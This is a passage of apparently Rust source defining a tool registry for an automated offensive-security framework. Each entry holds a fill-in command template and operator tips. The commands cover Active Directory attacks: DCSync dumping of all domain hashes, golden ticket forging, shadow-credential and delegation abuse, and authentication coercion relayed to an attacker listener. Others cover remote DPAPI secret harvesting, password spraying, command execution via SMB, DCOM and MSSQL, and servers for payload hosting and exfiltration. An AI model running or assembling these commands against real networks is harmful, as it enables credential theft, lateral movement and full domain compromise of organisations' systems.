        "Turn a .pfx into a TGT + NT hash via PKINIT",
        "Consumes an ESC1/shadow-cred .pfx. Output feeds secretsdump/nxc.",
        yields: [Credentials, Hashes], weight: 79),
    tool!("certipy-shadow", "Certipy shadow creds", ["certipy-ad", "certipy"], Exploit, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "certipy-ad shadow auto -u {upn} -p '{pass}' -dc-ip {dc_ip} -account {user}",
        "Shadow credentials via msDS-KeyCredentialLink",
        "Needs GenericWrite/GenericAll over the target. 'shadow auto' = add key + auth + cleanup.",
        yields: [Hashes], weight: 77),
    tool!("addcomputer", "impacket addcomputer", ["impacket-addcomputer", "addcomputer.py"],
        Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-addcomputer -computer-name 'ATTACKER$' -computer-pass 'Password123!' -dc-ip {dc_ip} {domain}/{user}:'{pass}'",
        "Add a machine account (MachineAccountQuota abuse)",
        "Default quota is 10. Provides the ATTACKER$ account needed for RBCD/shadow-cred chains.",
        yields: [Credentials], weight: 74),
    tool!("rbcd", "impacket rbcd", ["impacket-rbcd", "rbcd.py"], Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-rbcd -delegate-to 'TARGET$' -delegate-from 'ATTACKER$' -action write -dc-ip {dc_ip} {domain}/{user}:'{pass}'",
        "Resource-based constrained delegation write",
        "Needs write over TARGET's delegation attr + control of ATTACKER$. Then getST -u2u.",
        yields: [], weight: 73),
    tool!("dacledit", "impacket dacledit", ["impacket-dacledit", "dacledit.py"], Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-dacledit -action write -rights FullControl -principal {user} -target-dn TARGET_DN -dc-ip {dc_ip} {domain}/{user}:'{pass}'",
        "Grant yourself rights on a target object (ACL abuse)",
        "Always -backup first to restore the old DACL. TARGET_DN from BloodHound/ldapsearch.",
        yields: [], weight: 72),
    tool!("owneredit", "impacket owneredit", ["impacket-owneredit", "owneredit.py"], Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-owneredit -action write -new-owner {user} -target TARGET -dc-ip {dc_ip} {domain}/{user}:'{pass}'",
        "Take ownership of an object (WriteOwner abuse)",
        "Classic ACL chain step 1: take ownership, then dacledit to grant yourself rights.",
        yields: [], weight: 71),
    tool!("getst", "impacket getST (S4U)", ["impacket-getST", "getST.py"], CredAccess, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-getST -spn cifs/TARGET -impersonate administrator -dc-ip {dc_ip} {domain}/'ATTACKER$':'Password123!'",
        "S4U ticket for constrained delegation / RBCD",
        "Add -u2u for RBCD. Export KRB5CCNAME to the .ccache afterwards, then psexec -k -no-pass.",
        yields: [Tickets], weight: 70),
    tool!("coercer", "Coercer", ["coercer"], Exploit, Speed::Medium,
        Applies { needs_cred: true, global: true, ..AP },
        "coercer coerce -u {user} -p '{pass}' -d {domain} -t {ip} -l {iface}",
        "Coerce authentication (MS-EFSR/RPRN/DFSNM/...)",
        "-l is your relay/listener. Pair with ntlmrelayx or certipy relay. Loud.",
        yields: [], weight: 66),
    tool!("petitpotam", "PetitPotam", ["PetitPotam.py", "petitpotam"], Exploit, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "PetitPotam.py -u {user} -p '{pass}' -d {domain} {iface} {dc_ip}",
        "MS-EFSRPC coercion (often unauth on unpatched DCs)",
        "Args are <listener> <target>. Feed the coerced auth to ntlmrelayx / certipy relay.",
        yields: [], weight: 65),
    tool!("printerbug", "PrinterBug", ["printerbug.py", "printerbug"], Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "printerbug.py {domain}/{user}:'{pass}'@{dc_ip} {iface}",
        "MS-RPRN spooler coercion",
        "{iface} = your listener IP. Needs any valid domain credential.",
        yields: [], weight: 64),
    tool!("mitm6", "mitm6", ["mitm6"], Exploit, Speed::Slow,
        Applies { needs_domain: true, global: true, ..AP },
        "mitm6 -d {domain} -i {iface}",
        "IPv6 DHCP/DNS takeover for NTLM relay",
        "Pair with ntlmrelayx -6. Very loud on the wire — time-box it.",
        yields: [], weight: 60),
    tool!("bloodyad", "bloodyAD", ["bloodyAD"], AdEnum, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "bloodyAD --host {dc_ip} -d {domain} -u {user} -p '{pass}' get children",
        "Swiss-army AD reads and writes",
        "Writes: add genericAll <DN> <target>, add shadowCredentials <target>, set password. -k for Kerberos.",
        yields: [DomainInfo], weight: 76),
    tool!("ldapdomaindump", "ldapdomaindump", ["ldapdomaindump"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "ldapdomaindump -u '{domain}\\{user}' -p '{pass}' -o {outdir} {dc_ip}",
        "Dump the whole directory to HTML/JSON/grep files",
        "Great offline triage of users/computers/groups/trusts.",
        yields: [Users, DomainInfo], weight: 75),
    tool!("windapsearch", "windapsearch", ["windapsearch"], AdEnum, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "windapsearch --dc-ip {dc_ip} -d {domain} -u {user} -p '{pass}' --da",
        "Targeted LDAP queries (privileged users, delegation)",
        "Lighter than ldapdomaindump: --da, --privileged-users, --unconstrained.",
        yields: [Users, DomainInfo], weight: 74),
    tool!("adidnsdump", "adidnsdump", ["adidnsdump"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "adidnsdump -u '{domain}\\{user}' -p '{pass}' -r {dc_ip}",
        "Dump AD-integrated DNS (internal hostnames -> IPs)",
        "Any authenticated user can read this. -r resolves records. Maps the internal estate.",
        yields: [Hosts], weight: 72),
    // ─── pivot / post-exploitation / file transfer ───
    tool!("socat-relay", "socat relay", ["socat"], Pivot, Speed::Fast,
        Applies { needs_compromised: true, ..AP },
        "socat TCP-LISTEN:{port},fork,reuseaddr TCP:{ip}:{port}",
        "TCP port-forward/relay on a foothold",
        "Simple relay through a compromised host when you can't run a full tunnel.",
        yields: [Tunnel], weight: 60),
    tool!("smbserver", "impacket smbserver", ["impacket-smbserver", "smbserver.py"],
        PostExploit, Speed::Fast,
        Applies { global: true, ..AP },
        "impacket-smbserver -smb2support share {outdir}",
        "Instant SMB share for tool drop / exfil",
        "Add -user U -password P to satisfy Win10/11 which block guest access.",
        yields: [Files], weight: 62),
    tool!("updog", "updog", ["updog"], PostExploit, Speed::Fast,
        Applies { global: true, ..AP },
        "updog -d {outdir} -p {port}",
        "HTTP server with an upload form (host + exfil)",
        "Payload hosting and exfil in one. --ssl for TLS.",
        yields: [Files], weight: 55),
    // ─── utility (ProjectDiscovery) ───
    tool!("naabu", "naabu", ["naabu"], PortScan, Speed::Fast,
        Applies { global: true, ..AP },
        "naabu -host {ip} -top-ports 1000 -json -o {outfile}",
        "Fast SYN/CONNECT port scan",
        "-nmap-cli 'nmap -sV' chains straight into nmap. A rustscan alternative.",
        yields: [Ports], weight: 62),
    tool!("tlsx", "tlsx", ["tlsx"], ServiceEnum, Speed::Fast,
        Applies { service_like: Some("ssl"), ..AP },
        "tlsx -u {ip}:{port} -json -o {outfile}",
        "Grab TLS cert data (SANs, issuer, JARM)",
        "SANs are free subdomains/vhosts. Feed them back into dnsx/httpx.",
        yields: [Hosts], weight: 50),
    tool!("trivy", "Trivy", ["trivy"], VulnScan, Speed::Medium,
        Applies { global: true, ..AP },
        "trivy fs -f json -o {outfile} {outdir}",
        "Scan images/filesystems/IaC for CVEs and secrets",
        "trivy image <IMAGE> for containers; trivy repo <url> for source.",
        yields: [Vulns], weight: 40),
    // ═══════════════════ RED-TEAM EXPANSION 2 — impacket / netexec / AD ═══════════════════

    // ─── impacket suite (run from the operator box) ───
    tool!("lookupsid", "impacket lookupsid (RID brute)", ["impacket-lookupsid", "lookupsid.py"],
        AdEnum, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "impacket-lookupsid {domain}/'{user}':'{pass}'@{dc_ip}",
        "Enumerate domain users/groups by cycling RIDs over SAMR",
        "Works with any low-priv cred (or a null session on old DCs). Builds a userlist for spraying/roasting.",
        yields: [Users], weight: 80),
    tool!("find-delegation", "impacket findDelegation", ["impacket-findDelegation", "findDelegation.py"],
        AdEnum, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-findDelegation {domain}/'{user}':'{pass}' -dc-ip {dc_ip}",
        "List accounts with unconstrained / constrained / RBCD delegation",
        "Delegation is a top route to DA. Unconstrained on a non-DC = coerce a DC and grab its TGT.",
        yields: [DomainInfo], weight: 86),
    tool!("gettgt", "impacket getTGT", ["impacket-getTGT", "getTGT.py"],
        CredAccess, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-getTGT {domain}/'{user}':'{pass}' -dc-ip {dc_ip}",
        "Request a TGT and save a .ccache for pass-the-ticket",
        "Export KRB5CCNAME=<user>.ccache, then run impacket tools with -k -no-pass.",
        yields: [Tickets], weight: 78),
    tool!("ticketer", "impacket ticketer (golden/silver)", ["impacket-ticketer", "ticketer.py"],
        Exploit, Speed::Fast,
        Applies { needs_domain: true, global: true, ..AP },
        "impacket-ticketer -nthash {nthash} -domain-sid S-1-5-21-XXX -domain {domain} Administrator",
        "Forge a golden (krbtgt hash) or silver (service hash + -spn) ticket",
        "Get the domain SID from lookupsid/nxc. Golden = full domain persistence — use with care.",
        yields: [Tickets], weight: 74),
    tool!("smbexec", "impacket smbexec", ["impacket-smbexec", "smbexec.py"],
        Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "impacket-smbexec {domain}/'{user}':'{pass}'@{ip}",
        "Semi-interactive SYSTEM shell over SMB (no binary dropped to disk)",
        "Quieter than psexec — uses a service that runs commands via a temp .bat over a share.",
        yields: [Shell], weight: 82, interactive: true),
    tool!("atexec", "impacket atexec", ["impacket-atexec", "atexec.py"],
        Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "impacket-atexec {domain}/'{user}':'{pass}'@{ip} 'whoami'",
        "Run a command via the Task Scheduler",
        "Handy when psexec/wmi are blocked. One-shot command execution.",
        yields: [Shell], weight: 70),
    tool!("dcomexec", "impacket dcomexec", ["impacket-dcomexec", "dcomexec.py"],
        Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[135], ..AP },
        "impacket-dcomexec -object MMC20 {domain}/'{user}':'{pass}'@{ip}",
        "Command execution via DCOM (MMC20/ShellWindows/ShellBrowserWindow)",
        "Another lateral-movement channel when SMB exec is watched.",
        yields: [Shell], weight: 72, interactive: true),
    tool!("reg-query", "impacket reg", ["impacket-reg", "reg.py"],
        PostExploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "impacket-reg {domain}/'{user}':'{pass}'@{ip} query -keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services'",
        "Read/write the remote registry over RPC",
        "Dump SAM/SYSTEM/SECURITY hives (save) then secretsdump -sam/-system offline.",
        yields: [Files], weight: 60),
    tool!("changepasswd", "impacket changepasswd", ["impacket-changepasswd", "changepasswd.py"],
        Exploit, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "impacket-changepasswd {domain}/'{user}':'{pass}'@{dc_ip} -newpass 'NewPass123!'",
        "Change/reset a domain account password (SAMR/Kerberos)",
        "The payoff of a GenericAll/ForceChangePassword ACL over a target user.",
        yields: [Credentials], weight: 66),
    tool!("goldenpac", "impacket goldenPac (MS14-068)", ["impacket-goldenPac", "goldenPac.py"],
        Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-goldenPac {domain}/'{user}':'{pass}'@{dc_ip}",
        "MS14-068 PAC forgery on unpatched DCs → instant DA",
        "Only unpatched pre-2015 DCs. Rare but game-over when present.",
        yields: [Shell], weight: 55),
    // ─── netexec (nxc) protocols + modules ───
    tool!("nxc-ntds", "netexec DCSync (--ntds)", ["nxc", "netexec"], CredAccess, Speed::Medium,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {dc_ip} -u '{user}' -p '{pass}' -d {domain} --ntds",
        "Dump the entire NTDS.dit (all domain hashes) via DCSync",
        "Needs DCSync rights (DA, or GetChanges/GetChangesAll). This is the whole domain — krbtgt included.",
        yields: [Hashes, Credentials], weight: 95),
    tool!("nxc-gpp", "netexec GPP passwords", ["nxc", "netexec"], CredAccess, Speed::Fast,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} -M gpp_password -M gpp_autologin",
        "Recover cpassword secrets from SYSVOL Group Policy Preferences",
        "The AES key is public — any authenticated user can decrypt these. Classic easy domain cred.",
        yields: [Credentials], weight: 84),
    tool!("nxc-users", "netexec user/RID enumeration", ["nxc", "netexec"], AdEnum, Speed::Fast,
        Applies { any_port: &[445], ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} --users --rid-brute 6000",
        "Enumerate domain users (and brute RIDs for a full list)",
        "--rid-brute works even when --users is restricted. Feed the list to kerbrute/asreproast.",
        yields: [Users], weight: 80),
    tool!("nxc-passpol", "netexec password policy", ["nxc", "netexec"], AdEnum, Speed::Fast,
        Applies { any_port: &[445], ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} --pass-pol",
        "Read the domain password/lockout policy",
        "Read this BEFORE spraying — lockout threshold decides how many guesses per window.",
        yields: [DomainInfo], weight: 76),
    tool!("nxc-bloodhound", "netexec LDAP → BloodHound", ["nxc", "netexec"], AdEnum, Speed::Medium,
        Applies { any_port: &[389, 636], needs_cred: true, ..AP },
        "nxc ldap {ip} -u '{user}' -p '{pass}' -d {domain} --bloodhound -c All --dns-server {dc_ip}",
        "Collect the BloodHound graph straight from netexec",
        "An alternative collector to bloodhound-python — same data, one command.",
        yields: [DomainInfo], weight: 82),
    tool!("nxc-mssql", "netexec MSSQL", ["nxc", "netexec"], SmbEnum, Speed::Fast,
        Applies { any_port: &[1433], needs_cred: true, ..AP },
        "nxc mssql {ip} -u '{user}' -p '{pass}' -d {domain} --local-auth -x 'whoami'",
        "Authenticate to MSSQL and run xp_cmdshell / query",
        "-q 'SELECT ...' to query; -x '<cmd>' auto-enables xp_cmdshell. MSSQL svc is often SYSTEM.",
        yields: [Shell], weight: 78),
    tool!("nxc-rdp", "netexec RDP check", ["nxc", "netexec"], Exploit, Speed::Fast,
        Applies { any_port: &[3389], needs_cred: true, ..AP },
        "nxc rdp {ip} -u '{user}' -p '{pass}' -d {domain}",
        "Validate RDP access (and nla) for a credential",
        "Add --screenshot to grab the logon/desktop. (Pwn3d!) means you can log in.",
        yields: [Session], weight: 70),
    tool!("nxc-ssh", "netexec SSH spray", ["nxc", "netexec"], CredAccess, Speed::Fast,
        Applies { any_port: &[22], ..AP },
        "nxc ssh {ip} -u {userlist} -p {passlist} --continue-on-success",
        "Spray SSH credentials across hosts",
        "Also does key auth with --key-file. Great for reusing recovered Linux creds.",
        yields: [Session], weight: 66),
    tool!("nxc-zerologon", "netexec Zerologon check", ["nxc", "netexec"], VulnScan, Speed::Fast,
        Applies { any_port: &[445], needs_dc: true, ..AP },
        "nxc smb {dc_ip} -u '' -p '' -M zerologon",
        "Safely check a DC for Zerologon (CVE-2020-1472)",
        "The nxc module only CHECKS by default — it does not reset the machine account. Confirm before exploiting.",
        yields: [Vulns], weight: 72),
    tool!("nxc-nopac", "netexec noPac check", ["nxc", "netexec"], VulnScan, Speed::Fast,
        Applies { any_port: &[445], needs_cred: true, needs_dc: true, ..AP },
        "nxc smb {dc_ip} -u '{user}' -p '{pass}' -d {domain} -M nopac",
        "Check noPac / sAMAccountName spoofing (CVE-2021-42278/42287)",
        "If MachineAccountQuota > 0 and DCs are unpatched, this is a fast path to DA.",
        yields: [Vulns], weight: 74),
    tool!("nxc-spider", "netexec share spider", ["nxc", "netexec"], SmbEnum, Speed::Medium,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} -M spider_plus",
        "Crawl readable shares and index interesting files",
        "Finds configs, backups, scripts and creds sitting on open shares. Output lands in ~/.nxc.",
        yields: [Files], weight: 74),
    // ─── AD attack / cred tools (operator box) ───
    tool!("gmsadumper", "gMSADumper", ["gMSADumper.py", "gmsadumper"], CredAccess, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "gMSADumper.py -u '{user}' -p '{pass}' -d {domain} -l {dc_ip}",
        "Dump gMSA managed-account passwords you're allowed to read",
        "gMSA accounts are often over-permissioned; reading one can hand you a service or admin identity.",
        yields: [Credentials, Hashes], weight: 78),
    tool!("pre2k", "pre2k (unauth pre-created computers)", ["pre2k"], CredAccess, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "pre2k unauth -d {domain} -dc-ip {dc_ip} -inputfile {userlist}",
        "Find computer accounts whose password is still the pre-Windows-2000 default",
        "Password = lowercase computer name. A quiet foothold that needs no existing credential.",
        yields: [Credentials], weight: 68),
    tool!("gettgtpkinit", "PKINITtools gettgtpkinit", ["gettgtpkinit.py"], CredAccess, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "gettgtpkinit.py -cert-pfx {outfile} -pfx-pass '' {domain}/'{user}' {outdir}/tgt.ccache",
        "Turn an ADCS/shadow-cred .pfx into a Kerberos TGT (PKINIT)",
        "Feeds getnthash.py (UnPAC-the-hash) to recover the NT hash, or use the ccache directly.",
        yields: [Tickets], weight: 72),
    tool!("pywhisker", "pyWhisker (shadow credentials)", ["pywhisker", "pywhisker.py"], Exploit, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "pywhisker -d {domain} -u {user} -p '{pass}' --target TARGET --action add --dc-ip {dc_ip}",
        "Add msDS-KeyCredentialLink (shadow creds) on a target you can write",
        "Alt to certipy shadow. Output .pfx → gettgtpkinit → PKINIT auth as the target.",
        yields: [Credentials], weight: 76),
    tool!("krbrelayx", "krbrelayx", ["krbrelayx.py", "krbrelayx"], Exploit, Speed::VerySlow,
        Applies { global: true, ..AP },
        "krbrelayx.py -aesKey <aes256> -t ldap://{dc_ip} --delegate-access",
        "Relay coerced Kerberos auth (unconstrained delegation / RBCD)",
        "Pair with a coercion (printerbug/petitpotam) against a host you control the DNS/SPN for.",
        yields: [Session], weight: 60),
    tool!("dfscoerce", "DFSCoerce", ["dfscoerce.py", "dfscoerce"], Exploit, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "dfscoerce.py -u {user} -p '{pass}' -d {domain} {iface} {dc_ip}",
        "Coerce DC authentication over MS-DFSNM",
        "Another coercion vector when PetitPotam is patched. Feed to ntlmrelayx/krbrelayx.",
        yields: [], weight: 62),
    tool!("sprayhound", "sprayhound", ["sprayhound"], CredAccess, Speed::Medium,
        Applies { needs_dc: true, global: true, ..AP },
        "sprayhound -d {domain} -dc {dc_ip} -U {userlist} -p '{pass}'",
        "Password-spray with built-in lockout awareness (+ BloodHound marking)",
        "Reads the domain lockout policy and backs off, and can mark owned users in BloodHound.",
        yields: [Credentials], weight: 72),
    tool!("donpapi", "DonPAPI (DPAPI secrets)", ["donpapi", "DonPAPI"], CredAccess, Speed::Medium,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "donpapi collect -u {user} -p '{pass}' -d {domain} --target {ip}",
        "Remotely harvest DPAPI secrets: browser creds, wifi, creds vault, RDP",
        "Needs local admin. Pulls masterkeys + protected blobs and decrypts them for you.",
        yields: [Credentials], weight: 80),
    tool!("hekatomb", "Hekatomb (domain-wide DPAPI)", ["hekatomb"], CredAccess, Speed::Slow,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "hekatomb -u {user} -p '{pass}' -d {domain} -dns {dc_ip} smb://{dc_ip}",
        "Domain-wide DPAPI: pull the backup key from the DC and decrypt every user's secrets",
        "With DA + the DPAPI domain backup key you can decrypt DPAPI blobs for the whole domain.",
        yields: [Credentials], weight: 70),
    tool!("ldeep", "ldeep LDAP dump", ["ldeep"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "ldeep ldap -u {user} -p '{pass}' -d {domain} -s ldap://{dc_ip} all {outdir}",
        "Rich LDAP dump: trusts, delegation, GPO, PSO, ACLs",
        "Writes many JSON files; also supports offline queries from the cached dump.",
        yields: [Users, DomainInfo], weight: 74),
    tool!("adpeas", "adPEAS", ["adPEAS", "adpeas"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "adPEAS -u {user} -p '{pass}' -d {domain} -dc {dc_ip}",
        "One-shot AD enumeration + low-hanging attack paths (kerberoast, AS-REP, delegation, ADCS)",
        "A good 'what's wrong with this domain' first pass once you hold a credential.",
        yields: [DomainInfo, Vulns], weight: 76),
    tool!("certipy-relay", "certipy relay (ESC8/ESC11)", ["certipy-ad", "certipy"], Exploit, Speed::VerySlow,
        Applies { global: true, ..AP },
        "certipy-ad relay -target http://CA_HOST -template DomainController",
        "Relay coerced NTLM auth to the ADCS web-enrollment endpoint",
        "Pair with petitpotam/coercer to relay a DC's auth and mint a DC certificate → DCSync.",
        yields: [Credentials], weight: 74),
    tool!("rusthound", "RustHound-CE collector", ["rusthound-ce", "rusthound"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "rusthound-ce -d {domain} -u {user} -p '{pass}' -i {dc_ip} -c All -z",
        "Fast BloodHound-CE collector written in Rust",
        "A quick, low-dependency alternative to bloodhound-python for BloodHound Community Edition.",
        yields: [DomainInfo], weight: 72),
    // ─── recon / web gaps ───
    tool!("amass", "amass (passive)", ["amass"], Discovery, Speed::Medium,
        Applies { needs_domain: true, global: true, ..AP },
        "amass enum -passive -d {domain} -json {outfile}",
        "Passive subdomain enumeration across many sources",
        "Stay passive for OPSEC; active mode resolves and bruteforces (loud).",
        yields: [Hosts], weight: 58),
    tool!("gobuster-dir", "gobuster dir", ["gobuster"], DirEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "gobuster dir -u {url} -w {wordlist} -x php,txt,html,bak -t 40 -o {outfile}",
        "Directory/file brute force",
        "The classic. feroxbuster/ffuf are faster/recursive, but gobuster is everywhere.",
        yields: [WebPaths], weight: 62),
    tool!("hakrawler", "hakrawler", ["hakrawler"], WebEnum, Speed::Fast,
        Applies { service_like: Some("http"), ..AP },
        "echo {url} | hakrawler -d 3 -u",
        "Fast endpoint crawler (links, JS, forms)",
        "Pipe target URLs in; feed discovered params to dalfox/x8.",
        yields: [WebPaths], weight: 58),
    tool!("waybackurls", "waybackurls", ["waybackurls"], Discovery, Speed::Medium,
        Applies { needs_domain: true, global: true, ..AP },
        "waybackurls {domain} > {outfile}",
        "Historical URLs from the Wayback Machine",
        "Finds dead endpoints and parameters worth probing.",
        yields: [WebPaths], weight: 50),
    tool!("jwt-tool", "jwt_tool", ["jwt_tool", "jwt_tool.py"], ApiEnum, Speed::Fast,
        Applies { service_like: Some("http"), ..AP },
        "jwt_tool <JWT> -M at -t {url}",
        "Test JSON Web Tokens: alg-none, key confusion, weak HMAC, tampering",
        "Grab a JWT from the app first. -C -d wordlist to crack a weak HMAC secret.",
        yields: [Vulns], weight: 56),
    tool!("ssh-audit", "ssh-audit", ["ssh-audit"], ServiceEnum, Speed::Fast,
        Applies { any_port: &[22], ..AP },
        "ssh-audit {ip}",
        "Audit SSH server config, algorithms and known CVEs",
        "",
        yields: [Vulns], weight: 46),
    tool!("netdiscover", "netdiscover (ARP sweep)", ["netdiscover"], Discovery, Speed::Fast,
        Applies { global: true, ..AP },
        "netdiscover -r {subnet}",
        "Active ARP host discovery on a local segment",
        "Great on an internal L2 network where ICMP is filtered but ARP still answers.",
        yields: [Hosts], weight: 48),
    // ─── cracking mode gaps ───
    tool!("hashcat-dcc2", "hashcat DCC2 (m2100)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 2100 {hashfile} {passlist} -O --status",
        "Crack cached domain credentials (mscash2 / DCC2)",
        "From secretsdump's cached creds. Slow KDF — needs a good wordlist + rules.",
        yields: [Credentials], weight: 60),
    tool!("hashcat-tgs-aes", "hashcat TGS AES (m19700)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 19700 {hashfile} {passlist} -O --status",
        "Crack AES-256 Kerberoast tickets ($krb5tgs$18$)",
        "Modern accounts return AES tickets — use 19700 instead of 13100.",
        yields: [Credentials], weight: 62),
    tool!("hashcat-bcrypt", "hashcat bcrypt (m3200)", ["hashcat"], Cracking, Speed::VerySlow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 3200 {hashfile} {passlist} --status",
        "Crack bcrypt hashes ($2a$/$2b$/$2y$)",
        "Deliberately slow — keep the wordlist tight and targeted.",
        yields: [Credentials], weight: 44),
    tool!("hashcat-sha512crypt", "hashcat sha512crypt (m1800)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 1800 {hashfile} {passlist} --status",
        "Crack Linux /etc/shadow sha512crypt ($6$) hashes",
        "From a captured /etc/shadow. Combine with rules for mangled passwords.",
        yields: [Credentials], weight: 52),
];
